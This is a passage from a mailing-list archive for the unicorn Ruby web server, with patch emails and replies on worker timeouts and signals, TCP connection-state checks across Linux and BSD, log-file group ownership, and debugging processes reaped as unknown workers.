     # * The master process never closes or reinitializes this once
     # initialized.  Signal handlers in the master process will write to
     # it to wake up the master from IO.select in exactly the same manner
-    # djb describes in http://cr.yp.to/docs/selfpipe.html
+    # djb describes in https://cr.yp.to/docs/selfpipe.html
     #
     # * The workers immediately close the pipe they inherit.  See the
     # Unicorn::Worker class for the pipe workers use.
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index 501930c..b826de4 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -64,7 +64,7 @@ def self.reopen_logs
           fp.reopen(fp.path, "a")
         else
           # We should not need this workaround, Ruby can be fixed:
-          #    http://bugs.ruby-lang.org/issues/9036
+          #    https://bugs.ruby-lang.org/issues/9036
           # MRI will not call call fclose(3) or freopen(3) here
           # since there's no associated std{in,out,err} FILE * pointer
           # This should atomically use dup3(2) (or dup2(2)) syscall
diff --git a/t/README b/t/README
index bcaf3ce..0d9b697 100644
--- a/t/README
+++ b/t/README
@@ -10,17 +10,17 @@ comfortable writing integration tests with.
 
 == Requirements
 
-* {Ruby 1.9.3+}[https://www.ruby-lang.org/] (duh!)
-* {GNU make}[http://www.gnu.org/software/make/]
+* {Ruby 1.9.3+}[https://www.ruby-lang.org/en/] (duh!)
+* {GNU make}[https://www.gnu.org/software/make/]
 * {socat}[http://www.dest-unreach.org/socat/]
-* {curl}[http://curl.haxx.se/]
+* {curl}[https://curl.haxx.se/]
 * standard UNIX shell utilities (Bourne sh, awk, sed, grep, ...)
 
 We do not use bashisms or any non-portable, non-POSIX constructs
 in our shell code.  We use the "pipefail" option if available and
 mainly test with {ksh}[http://kornshell.com/], but occasionally
 with {dash}[http://gondor.apana.org.au/~herbert/dash/] and
-{bash}[http://www.gnu.org/software/bash/], too.
+{bash}[https://www.gnu.org/software/bash/], too.
 
 == Running Tests
 
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: Make Worker#user support different process primary group and log file group
  @ 2018-09-13 22:53  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2018-09-13 22:53 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> This patch allows Worker#user to accept the group argument as an array
> of two strings, the first string being the process primary group, and
> the second string being the group that owns the log files.  This can
> help when you have a large number of applications that use unique
> primary groups, and want to have a user with the ability to read the log
> files for any of the applications, especially if you are on an operating
> system that only supports a small number of groups per user.

Fwiw, I don't understand why there's a blurb here for an
isolated patch when your commit message below is sufficient :)

Along the same lines, "--cover-letter" in git-format-patch(1)
isn't necessary for single patches, either, but they help with a
multi-patch series.

> Subject: [PATCH] Make Worker#user support different process primary group and
>  log file group
> 
> Previously, Unicorn always used the process's primary group as the
> group of the log file.  However, there are reasons to use a
> separate group for the log files, such as when you have many
> applications where each application uses its own user and primary
> group, but you want to be able to have a user read the log files
> for all applications.  Some operating systems have a fairly small
> limit on the number of groups per user, and it may not be feasible
> to have a user be in the primary group for all applications.

Anyways, this feature seems acceptable.  Pushed to master as
47fddb53aa0b7763f353ba515cf3fb5b2059f4f7

Thanks

^ permalink raw reply	[relevance 3%]

* [PATCH] Send SIGTERM before SIGKILL on timeout
@ 2018-02-24  8:48  4% Fumiaki MATSUSHIMA
  0 siblings, 0 replies; 200+ results
From: Fumiaki MATSUSHIMA @ 2018-02-24  8:48 UTC (permalink / raw)
  To: unicorn-public; +Cc: mtsmfm

To output a log or send an error to an error tracking service,
we need to receive a signal other than SIGKILL first.
---
Hi Unicorn team,

I'm not sure whether this change is acceptable, though
I can find some articles and patches to prevent SIGKILL
on timeout.
I think it would be great if this feature were supported by unicorn itself.

Could you give me your opinion?
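
For reference, a rough usage sketch of the proposed option (the
numbers are made up; the TERM trap mirrors the test below and only
illustrates logging a backtrace before the worker exits):

    # unicorn config: send SIGTERM at 55s, SIGKILL only at 60s
    timeout 60, sigterm: 55

    # in the application, installed after unicorn's own worker traps:
    Signal.trap(:TERM) do
      $stderr.puts caller.join("\n")
      exit
    end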

 lib/unicorn/configurator.rb | 16 +++++++++++++++-
 lib/unicorn/http_server.rb  | 27 +++++++++++++++++----------
 test/unit/test_signals.rb   | 43 +++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 75 insertions(+), 11 deletions(-)

diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index f34d38b..f854032 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -30,6 +30,7 @@ class Unicorn::Configurator
   # Default settings for Unicorn
   DEFAULTS = {
     :timeout => 60,
+    :sigterm_timeout => 60,
     :logger => Logger.new($stderr),
     :worker_processes => 1,
     :after_fork => lambda { |server, worker|
@@ -237,11 +238,24 @@ def before_exec(*args, &block)
   #
   # See http://nginx.org/en/docs/http/ngx_http_upstream_module.html
   # for more details on nginx upstream configuration.
-  def timeout(seconds)
+  #
+  # The following options may be specified:
+  #
+  # [:sigterm => seconds]
+  #
+  #   Send SIGTERM when worker process is timed out.
+  #   Workers can't output backtrace if it's received SIGKILL
+  #   so it's useful to send SIGTERM before SIGKILL to find slow codes.
+  #   If you specify sigterm greater than or equal to timeout, workers will be always killed by SIGKILL.
+  #
+  #   Default: same seconds as the timeout
+  def timeout(seconds, options = {})
     set_int(:timeout, seconds, 3)
     # POSIX says 31 days is the smallest allowed maximum timeout for select()
     max = 30 * 60 * 60 * 24
     set[:timeout] = seconds > max ? max : seconds
+
+    set_int(:sigterm_timeout, options[:sigterm] || set[:timeout], 3)
   end

   # Whether to exec in each worker process after forking.  This changes the
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 8674729..da7c420 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -11,7 +11,7 @@
 # See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
   # :stopdoc:
-  attr_accessor :app, :timeout, :worker_processes,
+  attr_accessor :app, :timeout, :sigterm_timeout, :worker_processes,
                 :before_fork, :after_fork, :before_exec,
                 :listener_opts, :preload_app,
                 :orig_app, :config, :ready_pipe, :user
@@ -284,10 +284,10 @@ def join
       when nil
         # avoid murdering workers after our master process (or the
         # machine) comes out of suspend/hibernation
-        if (last_check + @timeout) >= (last_check = time_now)
+        if (last_check + @sigterm_timeout) >= (last_check = time_now)
           sleep_time = murder_lazy_workers
         else
-          sleep_time = @timeout/2.0 + 1
+          sleep_time = @sigterm_timeout/2.0 + 1
           @logger.debug("waiting #{sleep_time}s after suspend/hibernation")
         end
         maintain_worker_count if respawn
@@ -495,21 +495,29 @@ def close_sockets_on_exec(sockets)

   # forcibly terminate all workers that haven't checked in in timeout seconds.  The timeout is implemented using an unlinked File
   def murder_lazy_workers
-    next_sleep = @timeout - 1
+    next_sleep = @sigterm_timeout - 1
     now = time_now.to_i
     @workers.dup.each_pair do |wpid, worker|
       tick = worker.tick
       0 == tick and next # skip workers that haven't processed any clients
       diff = now - tick
-      tmp = @timeout - diff
+      tmp = @sigterm_timeout - diff
+
       if tmp >= 0
         next_sleep > tmp and next_sleep = tmp
         next
       end
       next_sleep = 0
-      logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
-                   "(#{diff}s > #{@timeout}s), killing"
-      kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+
+      if diff > @timeout
+        logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
+        "(#{diff}s > #{@timeout}s), killing with SIGKILL"
+        kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+      elsif diff > @sigterm_timeout
+        logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
+        "(#{diff}s > #{@sigterm_timeout}s), killing with SIGTERM"
+        kill_worker(:TERM, wpid) # take no prisoners for timeout violations
+      end
     end
     next_sleep <= 0 ? 1 : next_sleep
   end
@@ -655,7 +663,6 @@ def init_worker_process(worker)
     LISTENERS.each { |sock| sock.close_on_exec = true }

     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    self.timeout /= 2.0 # halve it for select()
     @config = nil
     build_app! unless preload_app
     @after_fork = @listener_opts = @orig_app = nil
@@ -718,7 +725,7 @@ def worker_loop(worker)

       # timeout used so we can detect parent death:
       worker.tick = time_now.to_i
-      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
+      ret = IO.select(readers, nil, nil, @sigterm_timeout / 2.0) and ready = ret[0]
     rescue => e
       redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 4592819..dc74a9b 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -118,6 +118,49 @@ def test_timeout_slow_response
       Process.kill(:TERM, pid) rescue nil
   end

+  def test_timeout_slow_response_with_sigterm
+    pid = fork {
+      app = lambda { |env|
+        Signal.trap(:TERM) {
+          puts 'Killed by SIGTERM'
+
+          exit
+        }
+
+        sleep
+      }
+      redirect_test_io {
+        Tempfile.open(['config', '.rb']) { |file|
+          file.write(<<-EOS)
+            timeout 100, sigterm: 3
+          EOS
+
+          file.flush
+
+          HttpServer.new(app, @server_opts.merge(config_file: file.path)).start.join
+        }
+      }
+    }
+    t0 = Time.now
+    wait_workers_ready("test_stderr.#{pid}.log", 1)
+    sock = TCPSocket.new('127.0.0.1', @port)
+    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
+
+    buf = nil
+    assert_raises(EOFError,Errno::ECONNRESET,Errno::EPIPE,Errno::EINVAL,
+                  Errno::EBADF) do
+      buf = sock.sysread(4096)
+    end
+    diff = Time.now - t0
+    assert_nil buf
+    assert diff > 1.0, "diff was #{diff.inspect}"
+    assert diff < 60.0
+    assert_equal "Killed by SIGTERM\n", File.read("test_stdout.#{pid}.log")
+    wait_workers_ready("test_stderr.#{pid}.log", 1)
+    ensure
+      Process.kill(:TERM, pid) rescue nil
+  end
+
   def test_response_write
     app = lambda { |env|
       [ 200, { 'Content-Type' => 'text/plain', 'X-Pid' => Process.pid.to_s },
--
2.14.1


^ permalink raw reply related	[relevance 4%]

* Re: Reaping process with unknown worker
  2017-10-19 19:23  3%       ` Alberto De Gaspari
@ 2017-10-19 19:37  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-10-19 19:37 UTC (permalink / raw)
  To: Alberto De Gaspari; +Cc: unicorn-public

Alberto De Gaspari <a.degaspari@18months.it> wrote:
> >> with a line like this in the log:
> >> INFO -- : reaped #<Process::Status: pid 16101 exit 0> worker=unknown
> >> if i run
> >> # ps axf |grep 16101
> >> i only get the ps line:
> >> 10277 pts/4    S+     0:00          \_ grep 16101
> >>
> >> consider that i have loads of this line in the log, like at least 1
> >> every minute.
> >>
> >> what could cause those reaps?
> > 
> > Reaping happens after a process exits, so it won't show up
> > in "ps" once it's reaped.
> > 
> ok, got it:
> but if at t0 i run ps axf and save the result, when at t1 i find one of
> the lines in the stderr_log and try to grep the stated pid in the saved
> result of t0 i don't find anything.

I guess this is because the process is too short-lived.  Can you
audit your code for when you spawn applications and check that?

Actually, what is curious is that your master process is reaping
these processes (not the workers); yet your workers are not
dying and getting reaped.

Are you using preload_app?

If so, do you spawn any background processes at load time?
Or are there any background threads in the master process?

Does the problem go away if you disable preload_app?

Because, in normal applications, workers may spawn background
processes, but it's rare for the master to spawn anything but
workers themselves.
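
A contrived sketch of how that can happen (the command name is
hypothetical): with preload_app true, code like this evaluated at
load time spawns a child owned by the master, and the master's
waitpid(-1) loop later reaps it and logs worker=unknown:

    # config.ru or an initializer, evaluated in the master
    pid = spawn('short-lived-helper')
    # nothing ever waits on pid, so the unicorn master reaps it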

> how can i detect what it's reaping? do you consider this a normal
> behavior for a rails app which actually only receives simple get
> requests and save the result in a pg db?(that's what the small instance
> of unicorn does, the other is more complex, but shows the same amount
> and type of info messages in errors)

AFAIK, you cannot detect what it's reaping portably...

You can try the following hack to look for defunct (zombie)
processes before unicorn calls waitpid2.  However, keep in mind
it is subject to race conditions so not 100% reliable:

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f33aa25..f57271e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -396,6 +396,7 @@ def awaken_master
   # reaps all unreaped workers
   def reap_all_workers
     begin
+      system('ps | grep defunct')
       wpid, status = Process.waitpid2(-1, Process::WNOHANG)
       wpid or return
       if @reexec_pid == wpid



One other thing you try do (on Linux) is strace the master:

	strace -p $PID_OF_MASTER -f -e execve,clone

And see what the master is spawning.  I suppose other OS has
similar functions (truss/ktruss/...)

^ permalink raw reply related	[relevance 0%]

* Re: Reaping process with unknown worker
  @ 2017-10-19 19:23  3%       ` Alberto De Gaspari
  2017-10-19 19:37  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alberto De Gaspari @ 2017-10-19 19:23 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

>> with a line like this in the log:
>> INFO -- : reaped #<Process::Status: pid 16101 exit 0> worker=unknown
>> if i run
>> # ps axf |grep 16101
>> i only get the ps line:
>> 10277 pts/4    S+     0:00          \_ grep 16101
>>
>> consider that i have loads of this line in the log, like at least 1
>> every minute.
>>
>> what could cause those reaps?
> 
> Reaping happens after a process exits, so it won't show up
> in "ps" once it's reaped.
> 
OK, got it.
But if at t0 I run ps axf and save the result, and at t1 I find one of
these lines in the stderr log and try to grep for the stated pid in the
saved result from t0, I don't find anything.
How can I detect what it's reaping? Do you consider this normal
behavior for a rails app which only receives simple GET
requests and saves the result in a pg db? (That's what the small
instance of unicorn does; the other is more complex, but shows the same
amount and type of info messages in its errors.)

-- 
Cordiali saluti
Alberto De Gaspari
CTO & Software Engineer

18Months S.r.l
Via Copernico 38, Milano 20125, Italia
Tel:    +39 02.92852164
Fax:    +39 02.45075016
Mob:    +39 349.1624385
MeetMe: doodle.com/albertodega
Email:  a.degaspari@18months.it
web:    www.18months.it

^ permalink raw reply	[relevance 3%]

* Re: Reaping process with unknown worker
  2017-10-19 17:42  4% Reaping process with unknown worker Alberto De Gaspari
@ 2017-10-19 18:20  0% ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-10-19 18:20 UTC (permalink / raw)
  To: Alberto De Gaspari; +Cc: unicorn-public

Alberto De Gaspari <a.degaspari@18months.it> wrote:
> Hello everyone, maybe this is a noob question, but it seems strange from
> my point of view, so here i am:
> 
> I have 2 master processes running on the same server, pointing to the
> same rails application dir.
> I need 2 of them because i need some workers to be dedicated responding
> to requests coming from a specific socket(and i'm not sure this is the
> right way to do this)

That's fine.

> Both the standard_error_logs are full of messages like the following:
> 
> INFO -- : reaped #<Process::Status: pid 23835 exit 0> worker=unknown
> 
> is this a misconfiguration or something similar?

Does your application fork processes?  It may not be reaping
them.   Are your normal unicorn workers dying, too?

You can check the process tree or periodically run "ps" to see
what was running as the reaped pid before it died.

I use "ps axf" from the "procps" package on some Linux sytems;
or "pstree" if installed to see the process tree.

^ permalink raw reply	[relevance 0%]

* Reaping process with unknown worker
@ 2017-10-19 17:42  4% Alberto De Gaspari
  2017-10-19 18:20  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alberto De Gaspari @ 2017-10-19 17:42 UTC (permalink / raw)
  To: unicorn-public

Hello everyone, maybe this is a noob question, but it seems strange from
my point of view, so here I am:

I have 2 master processes running on the same server, pointing to the
same rails application dir.
I need 2 of them because I need some workers dedicated to responding
to requests coming from a specific socket (and I'm not sure this is the
right way to do this).

Both the standard_error_logs are full of messages like the following:

INFO -- : reaped #<Process::Status: pid 23835 exit 0> worker=unknown

Is this a misconfiguration or something similar?
Thank you in advance!
Alberto

^ permalink raw reply	[relevance 4%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  2017-10-03 17:15  0%   ` Eric Wong
@ 2017-10-03 18:20  4%     ` Xuanzhong Wei
  0 siblings, 0 replies; 200+ results
From: Xuanzhong Wei @ 2017-10-03 18:20 UTC (permalink / raw)
  To: e; +Cc: azrlew, code, maillist, pere.joan, philip, unicorn-public

Thanks for the quick response!

Here is the compiler version:
gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC)

Furthermore, although I was not able to reproduce the issue with the code
that caused the problem, I generated some core files of normal and abnormal
masters and workers.

Here is a glimpse of `ruby_current_vm.objspace.global_list`,
comparing normal and abnormal masters running the same code.

// normal
(gdb)
$72 = (struct gc_list *) 0x7feb65625680
$73 = 5
---------------------------------------------
(gdb)
$74 = (struct gc_list *) 0x7feb6424e2a0
$75 = 7 # T_ARRAY
---------------------------------------------
(gdb)
$76 = (struct gc_list *) 0x7feb63a8c120
$77 = 8


// abnormal
(gdb)
$72 = (struct gc_list *) 0x7f7547651cc0
$73 = 5
---------------------------------------------
(gdb)
$74 = (struct gc_list *) 0x7f7546939760
$75 = 27 # T_NODE
---------------------------------------------
(gdb)
$76 = (struct gc_list *) 0x7f7546583e70
$77 = 8

Note that I have checked the whole global_list; the order looks the same.
Hence, I am quite sure that the T_NODE in the abnormal one comes from the same
module as the T_ARRAY in the normal one.
And judging from the contents of the T_ARRAY, the module should be unicorn_http.

^ permalink raw reply	[relevance 4%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  2017-10-03 14:52  3% ` Xuanzhong Wei
@ 2017-10-03 17:15  0%   ` Eric Wong
  2017-10-03 18:20  4%     ` Xuanzhong Wei
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-10-03 17:15 UTC (permalink / raw)
  To: Xuanzhong Wei; +Cc: code, maillist, pere.joan, philip, unicorn-public

Xuanzhong Wei <azrlew@gmail.com> wrote:
> We have the same issue here.
> 
> IMHO, it is a bug introduced by 979ebcf91705709be5041a3be4514e5f1f6ec02c.
> The `mark_ary` get GCed before we add it to the ruby's global_list
> since we are doing memory allocations before calling rb_global_variable.
> 
> A simple test can be found here:
> https://github.com/azrle/ruby_c_ext_test

Thanks, which compiler and version did you use?

> I will try to submit a patch later.

https://bogomips.org/unicorn-public/20171003145718.30404-1-azrlew@gmail.com/raw

Yes, seems correct since the compiler doesn't need to keep
mark_ary anymore once it only needs the address (&mark_ary).
OBJ_FREEZE is an inline which does nothing to prevent
the compiler from only keeping RBasic->flags around and
not the actual VALUE.

^ permalink raw reply	[relevance 0%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  @ 2017-10-03 14:52  3% ` Xuanzhong Wei
  2017-10-03 17:15  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Xuanzhong Wei @ 2017-10-03 14:52 UTC (permalink / raw)
  To: e; +Cc: code, maillist, pere.joan, philip, unicorn-public, Xuanzhong Wei

We have the same issue here.

IMHO, it is a bug introduced by 979ebcf91705709be5041a3be4514e5f1f6ec02c.
The `mark_ary` gets GCed before we add it to Ruby's global_list,
since we are doing memory allocations before calling rb_global_variable.

A simple test can be found here:
https://github.com/azrle/ruby_c_ext_test

I will try to submit a patch later.

^ permalink raw reply	[relevance 3%]

* Re: after_worker_exit on murder
  @ 2017-04-04 14:32  3% ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-04-04 14:32 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public

On 04/04 10:08, Simon Eskildsen wrote:
> Hi!
> 
> With Jeremy Evans' work on `after_worker_exit`, I was hoping I could
> replace our internal fork which has a `before_murder` hook to report
> to monitoring systems when workers are forcibly killed. However, the
> `after_worker_exit` is only called on reaping -- not when murdering.
> 
> How would you feel about executing this on the murder path?
> Alternatively, we could add an `after_murder` hook for this path.

I checked and after_worker_exit is called when reaping the worker
after murdering, so I don't think any changes are necessary. I would
guess if you added it when murdering, it would be called twice on the
same worker.
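
For reference, a minimal sketch of the reporting hook Simon
describes, using the (server, worker, status) arguments documented
for after_worker_exit; the monitoring call is hypothetical:

    after_worker_exit do |server, worker, status|
      unless status.success?
        server.logger.error(
          "worker=#{worker.nr} pid=#{status.pid} died: #{status.inspect}")
        Monitoring.report_worker_death(status) # hypothetical reporter
      end
    end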

Thanks,
Jeremy

^ permalink raw reply	[relevance 3%]

* [PATCH] Check for SocketError on first ccc attempt
@ 2017-03-24 20:03  2% Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-03-24 20:03 UTC (permalink / raw)
  To: unicorn-public

On OpenBSD, getsockopt(2) does not support TCP_INFO.  With the current code,
this results in a 500 for all clients if check_client_connection is enabled
on OpenBSD.

This patch rescues SocketError on the first getsockopt call, and
if SocketError is raised, it doesn't check in the future.  This
should be the same behavior as if TCP_INFO was supported but
inspect did not return a string in the expected format.
---
 lib/unicorn/http_request.rb | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 7253497..6dc0aa7 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -29,7 +29,7 @@ class Unicorn::HttpParser
   EMPTY_ARRAY = [].freeze
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false
-  @@tcpi_inspect_ok = true
+  @@tcpi_inspect_ok = nil
 
   def self.input_class
     @@input_class
@@ -154,10 +154,20 @@ def closed_state?(state) # :nodoc:
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
     def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
-        opt = socket.getsockopt(:IPPROTO_TCP, :TCP_INFO).inspect
-        if opt =~ /\bstate=(\S+)/
+      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok != false
+        if @@tcpi_inspect_ok
+          opt = socket.getsockopt(:IPPROTO_TCP, :TCP_INFO).inspect
+        else
           @@tcpi_inspect_ok = true
+          opt = begin
+            socket.getsockopt(:IPPROTO_TCP, :TCP_INFO)
+          rescue SocketError
+            @@tcpi_inspect_ok = false
+            return write_http_header(socket)
+          end.inspect
+        end
+
+        if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
                 EMPTY_ARRAY if closed_state_str?($1)
         else
-- 
2.11.0


^ permalink raw reply related	[relevance 2%]

* [PATCH (ccc)] http_request: support proposed Raindrops::TCP states on
       [not found]     <20170316031652.17433-1-e@80x24.org>
@ 2017-03-21  2:55  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-03-21  2:55 UTC (permalink / raw)
  To: Simon Eskildsen, unicorn-public; +Cc: raindrops-public, Jeremy Evans

TCP state names/numbers seem stable within each OS, but differ in
name and numeric value between them.  So I started on this
patch series for raindrops last week:

  https://bogomips.org/raindrops-public/20170316031652.17433-1-e@80x24.org/T/

And things seem to be alright, for the most part.  Anyways
here's a proposed patch for unicorn which takes advantage of
the above (proposed) changes for raindrops and will allow
unicorn to support check_client_connection

Also Cc:-ing Jeremy to see if he has any input on the OpenBSD
side of things.

This goes on top of commit 20c66dbf1ebd0ca993e7a79c9d0d833d747df358
("http_request: reduce insn size for check_client_connection")
at: git://bogomips.org/unicorn ccc-tcp-v3

-------8<--------
Subject: [PATCH] http_request: support proposed Raindrops::TCP states on
 non-Linux

raindrops 0.18+ will have Raindrops::TCP state hash for portable
mapping of TCP states to their respective numeric values.  This
was necessary because TCP state numbers (and even macro names)
differ between FreeBSD and Linux (and possibly other OSes).

Favor using the Raindrops::TCP state hash if available, but
fall back to the hard-coded values since older versions of
raindrops did not support TCP_INFO on non-Linux systems.

While we're in the area, favor "const_defined?" over "defined?"
to reduce the inline constant cache footprint for branches
which are only evaluated once.

Patches to implement Raindrops::TCP for FreeBSD are available at:

  https://bogomips.org/raindrops-public/20170316031652.17433-1-e@80x24.org/T/
---
 lib/unicorn/http_request.rb | 38 +++++++++++++++++++++++++++++---------
 1 file changed, 29 insertions(+), 9 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 9010007..7253497 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -105,7 +105,7 @@ def hijacked?
     env.include?('rack.hijack_io'.freeze)
   end
 
-  if defined?(Raindrops::TCP_Info)
+  if Raindrops.const_defined?(:TCP_Info)
     TCPI = Raindrops::TCP_Info.allocate
 
     def check_client_connection(socket) # :nodoc:
@@ -118,14 +118,34 @@ def check_client_connection(socket) # :nodoc:
       end
     end
 
-    def closed_state?(state) # :nodoc:
-      case state
-      when 1 # ESTABLISHED
-        false
-      when 8, 6, 7, 9, 11 # CLOSE_WAIT, TIME_WAIT, CLOSE, LAST_ACK, CLOSING
-        true
-      else
-        false
+    if Raindrops.const_defined?(:TCP)
+      # raindrops 0.18.0+ supports FreeBSD + Linux using the same names
+      # Evaluate these hash lookups at load time so we can
+      # generate an opt_case_dispatch instruction
+      eval <<-EOS
+      def closed_state?(state) # :nodoc:
+        case state
+        when #{Raindrops::TCP[:ESTABLISHED]}
+          false
+        when #{Raindrops::TCP.values_at(
+              :CLOSE_WAIT, :TIME_WAIT, :CLOSE, :LAST_ACK, :CLOSING).join(',')}
+          true
+        else
+          false
+        end
+      end
+      EOS
+    else
+      # raindrops before 0.18 only supported TCP_INFO under Linux
+      def closed_state?(state) # :nodoc:
+        case state
+        when 1 # ESTABLISHED
+          false
+        when 8, 6, 7, 9, 11 # CLOSE_WAIT, TIME_WAIT, CLOSE, LAST_ACK, CLOSING
+          true
+        else
+          false
+        end
       end
     end
   else
-- 
EW

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  @ 2017-03-13 20:16  3%                   ` Simon Eskildsen
  0 siblings, 0 replies; 200+ results
From: Simon Eskildsen @ 2017-03-13 20:16 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

I've put ccc-tcp-v3 in production today--it appears to be working as
expected, still rejecting at the exact same rate as before (100-200
per second for us during steady-state).

On Wed, Mar 8, 2017 at 7:06 AM, Simon Eskildsen
<simon.eskildsen@shopify.com> wrote:
> Patch-set looks great Eric, thanks!
>
> I'm hoping to test this in production later this week or next, but
> we're a year behind on Unicorn (ugh), so will need to carefully roll
> that out.
>
> On Tue, Mar 7, 2017 at 7:26 PM, Eric Wong <e@80x24.org> wrote:
>> Eric Wong <e@80x24.org> wrote:
>>> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>>> > @@ -28,6 +29,7 @@ class Unicorn::HttpParser
>>> >    # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
>>> >    # 2.2+ optimizes hash assignments when used with literal string keys
>>> >    HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
>>> > +  EMPTY_ARRAY = [].freeze
>>>
>>> (minor) this was made before commit e06b699683738f22
>>> ("http_request: freeze constant strings passed IO#write")
>>> but I've trivially fixed it up, locally.
>>
>> And I actually screwed it up, pushed out ccc-tcp-v2 branch
>> with that fix squashed in :x
>>
>> Writing tests, now...

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Add worker_exec configuration option V2
  @ 2017-03-11  7:18  3%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-03-11  7:18 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> On 03/10 09:19, Eric Wong wrote:
> > tests, later, or you can.  I also had some FreeBSD test fixes
> > (which might apply to OpenBSD) on a VM somewhere which I'll Cc:
> > you on: there was also just SO_KEEPALIVE fix I posted:
> > 
> >   https://bogomips.org/unicorn-public/20170310203431.28067-1-e@80x24.org/raw
> 
> The C test code also returns 8 on OpenBSD, FWIW.  I'm happy to test any
> test fixes on OpenBSD, just let me know.

Thanks. I'll be happy to help fix any OpenBSD failures you see
from "gmake check"  I don't think the accept_filter fixes apply
to OpenBSD, but I guess the expr(1) fix did.

Thank you.

Same goes for NetBSD, DragonflyBSD or any other completely
Free/Open Source OSes anybody else here uses.

> > Jeremy Evans <code@jeremyevans.net> wrote:
> > > -      if pid = fork
> > > -        @workers[pid] = worker
> > > -        worker.atfork_parent
> > > +
> > > +      pid = if @worker_exec
> > > +        worker_spawn(worker)
> > >        else
> > > -        after_fork_internal
> > > -        worker_loop(worker)
> > > -        exit
> > > +        fork do
> > > +          after_fork_internal
> > > +          worker_loop(worker)
> > > +          exit
> > > +        end
> > 
> > I prefer to avoid the block with fork.  The block deepens the
> > stack for the running app, so it can affect GC efficiency.
> > 
> > Can be fixed in a separate patch...
> 
> That makes sense.  If you would like me to send a separate patch to fix
> it, I can do that.

Yes, please.

Not sure if we should automate the stack depth test...
I resisted it in the past since it might be too fragile
w.r.t changes to Ruby (even using "unicorn" via the
RubyGems-generated wrapper deepens it by 2).

Thanks again.

^ permalink raw reply	[relevance 3%]

* Re: Patch: Add after_worker_ready configuration option
  2017-02-23  9:23  2%     ` Eric Wong
@ 2017-02-23 20:00  0%       ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-02-23 20:00 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/23 09:23, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > On 02/23 02:32, Eric Wong wrote:
> > > Jeremy Evans <code@jeremyevans.net> wrote:
> > > Anyways, I'm somewhat inclined to accept this as well, but will
> > > think about it a bit, too.
> > > 
> > > One problem I have with this change is that it requires users
> > > read more documentation and know more caveats to use.
> >  
> > It's unfortunate, but I think it's necessary in this case. Unicorn's
> > default behavior works for most users, but this makes it so you
> > don't have to override HttpServer#init_worker_process to get similar
> > functionality.
> 
> Yeah.  Unfortunately, with every option comes more
> support/maintenance overhead.  So I'm trying to make sure we've
> explored every possible avenue before adding this new option.

I agree.  If I knew of a way to get this functionality without
